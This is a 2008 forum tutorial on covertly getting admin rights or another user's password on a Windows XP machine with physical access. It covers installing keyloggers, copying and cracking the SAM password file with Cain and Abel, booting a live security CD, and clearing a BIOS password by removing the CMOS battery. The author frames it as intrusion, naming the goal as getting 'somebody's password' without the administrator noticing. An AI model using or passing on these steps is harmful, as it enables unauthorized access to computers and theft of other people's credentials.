Getting admin on a winXP computer with physical access - Submitted By: littlegreenguy 2008-08-19 10:44:22
Ok, so you have got a computer that you want to get onto, sitting right in front of you. You want admin rights, or you want to get somebody's password.
There are several ways of doing this.
I'm only going to go through ways that let you find out the password. There are other ways, but surely the admin is going to notice if his password is changed. You *can* do it with the emergency boot cd, but its all a bit skiddish if you just change the pass.
1) The simplest means is a keylogger.
You can get a free one, home keylogger,at
http://www.spyarsenal.com/keylogger.
Alternatively, perfect keylogger is supposed to be good.
However, this only works if you have any limited user account, and anyway, anti-virus may recognise it, or you may not be able to install programs.
2) One possible location, If the system administrator has made a repair backup, then the SAM (password) file may be stored in:
[drive]/windows/repair
Once you have got this file, you just need to get cain and abel (
http://www.oxid.it/), and select dump SAM file. This will crack it, first off try a dictionary attack, if this does not work, you will need to brute force it. Bear in mind that this will take a long time, so you may want to save it to your USB key or floppy disk to do it at home.
3) Because the SAM file (the file that holds all of the passwords and logons for windows XP) cannot be copied in windows XP operating enviroment, we need to use an alternative operating system to copy the file so that we can crack it.
Download the auditors security collection from here:
http://new.remote-exploit.org/index.php/Auditor_mainWhen the computer is first booting up, hit "delete" or the specified key to enter setup. You will need to change the boot order to CDROM before the resource (i.e. hard drive or network) that the computer will boot winXP from. If it asks for the password, you'll need a screwedriver.
Open the case (if its a tower case, you may only need to take off one side), and look on the motherboard for a small button cell. Its about 1/2 inch diameter. Flip it out, and then put it back. Close the case again. Restart. Voila, no BIOS password.
Since its already been said in better detail than I can ever manage, at this link there are detailed instructions on obtaining the SAM file using the Auditors security collection. There's even a flash video of how to do it.
http://www.irongeek.com/i.php?page=security/localsamcrack2Any questions, pm or msn me
